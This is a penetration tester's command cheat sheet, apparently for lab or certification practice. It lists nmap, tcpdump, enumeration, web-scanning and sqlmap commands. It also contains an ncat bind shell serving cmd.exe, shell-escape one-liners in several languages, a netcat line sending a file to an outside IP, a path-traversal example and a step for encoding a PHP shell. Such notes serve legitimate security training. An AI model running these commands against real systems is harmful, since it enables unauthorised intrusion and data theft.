useful_command.txt

netstat -antp|grep sshd  ## find sshd to confirm that it's running

sudo service ssh start|stop ## start/stop ssh service

systemctl enable [service_name] ## enable service at boot

##Find command with all matching patern
find / -name sbd*

## Find all commands with pattern and describe them
find / -name sbd* -exec file {} \;

##Persist services at boot
update-rc ssh enable

##Grepping with cut, get all href in an index.html and look for all http:// cut them to get domain name
cat index.html | grep "href=" | cut -d"/" -f3| grep "cisco\.com" | cut -d'"' -f1 | sort -u ## remove dups

## to write a bash script to look up host IP address in a file of domains

for url in $(cat cisco.txt) do
host $url | grep "has address" | cut -d" " -f4
done

## ncat (new version of nc) can be done below for a bind shell
ncat -lvp 4444 -e cmd.exe --ssl --allow host_ip 

--allow switch to protect the connection from unwanted connection, this is one of the advs from nc.


PING SWEEP scan:

nmap -sn 1.2.3.1-254 -oG output-to-file.txt

Sweeping for common port:

nmap -p 80 1.2.3.1-254 -oG output-to-file.txt

NMAP Nmap Scripting Engine:

Allow script to automate tasks

NMAP Directories to note:

/usr/share/nmap/scripts

TCPDUMP: 

Commands to filter like wireshark below.

tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap  << filter by host IP
tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap << filter by dst IP
tcpdump -n port 81 -r password_cracking_filtered.pcap  << filter only port 81

NBTSCAN:

A tool to scan for netbios information

Metasploit:

First connect to postgresql service before launching msfconsole

hosts ## will contains all hosts scanned
db_nmap [ip_cdr] --top-ports 20 ## scan a range of ip with top 20 ports and store in db
services -p 443 ## will search database of all scanned hosts for specific ports

Staged and Non-Staged payloads:

Non-Staged payloads are ones that were sent by msf in its entirety. For instance, reverse_tcp payload on a SLMail 5.5 exploit.

Staged are split into 2 parts:
• First part is the "instructions" to the victim machine to tell it on where to connect back, which is the attacker's machine in most cases.
• Meterpreter is a staged payloads because it provides additional capabilities.

nbtscan 10.11.1.1-254

ENUM4LINUX tool:

Can be use to enumerate Windows server NULL SMB sessions.

enum4linux -a 10.11.1.227

SNMP  (UDP) scan:

Using nmap to find all ips running SNMP on port 161 as follow:

nmap -sU -p 161 ip-range

BUFFER OVERFLOW:

PATTERN_CREATE: A useful utility to generate random string patterns in MSF.

pattern_create -l [lengh]

PATTERN_OFFSET: A tool to calculate offset based on EIP value

pattern_offset -q 12345678

POST EXPLOITATION:

Break out the "jail" shell:

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

Favorite Language?
Try invoking a SHELL through your favorite language:

• python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
• perl -e 'exec "/bin/sh";'
• perl: exec "/bin/sh";
• ruby: exec "/bin/sh"
• lua: os.execute('/bin/sh')
• irb(main:001:0> exec "/bin/sh"

WEB SERVERS:
   a. run nikto scan: nikto -h <ip>
   b. gobuster -e - u http://10.11.1.x -w /usr/share/wordlists/dirb/common.txt
   c. gobuster -u http://10.11.1.x -w /usr/share/seclists/Discovery/Web_Content/common.txt   -s '200,204,301,302,307,403,500' -e
   d. use curl to create your own directory: curl -X MKCOL 'http://x.x.x.x/dirname'

dirb http://host -X .txt,.php,.html ## Look for hidden files
cadaver http://host/path/ ## if DAV is enabled, cadaver will provide a FTP like interface for easy access
curl -i -X OPTIONS http://host ## to find HTTP methods allowed, look for PUT MOVE COPY etc...

####MORE COMMANDS ####

Connect SSH via Squid:

ssh -o ProxyCommand='socat STDIO PROXY:192.168.56.102:%h:%p,proxyport=3128' john@192.168.56.102


DIR listing trick:

ls /accounts/../../../root/


Protocol port match enumeration:

amap 192.168.159.132 21 22 53 80 139 666 3306 12380

Find IP via arp-scan:

arp-scan -l

Netcat receive file:

cat file.zip | nc 1.2.3.4 port

Find hidden in binary:

binwalk -B filename

Convert to ascii to hex (good for db storage):

cat shell.php | xxd -ps | tr -d '\n'

Rember to add the prefix “0x” to make it hex officially

Port knocking with nmap:

nmap -Pn --host_timeout 201 --max-retries 0  -p 1 192.168.0.101
nmap -Pn --host_timeout 201 --max-retries 0  -p 2 192.168.0.101
nmap -Pn --host_timeout 201 --max-retries 0  -p 3 192.168.0.101

And rescan with nmap -sT -p- -A 192.168.0.10

SQLmap for enumeration:

sqlmap -o -u http://192.168.56.103:1337/978345210/index.php --forms --dbs --risk=3 --level=5

nmap -sV -A -p- -T 4 [IP] ## Aggressive scan to look for 65000ish ports open to leave no ports behind. TCP ONLY 

1) Start with a recon scan of the network to get an idea of the network:
nmap -Pn -F -sSU -T5 -oX /root/10.1.1.1-254.xml 10.1.1.1-254 | grep -v 'filtered|closed' > /root/quick_recon.txt

2) Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
nmap -Pn -sSU -T4 -p1-65535 -oX /root/10.1.1.110.xml 10.1.1.110 | grep -v 'filtered|closed'

3) Then run an intensive scan on the open ports per host, TCP and UDP separately to speed scan up:
tcp: nmap -nvv -Pn -sSV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-tcp.xml 10.1.1.110
udp: nmap -nvv -Pn -sUV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"udp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-udp.xml 10.1.1.110


# CROSS-COMPILING GCC on different versions of linux to avoid GLIBC errors
gcc -m32 -Wl,--hash-style=both -o [binary_name] [source.c]

cadaver http://
davtest http://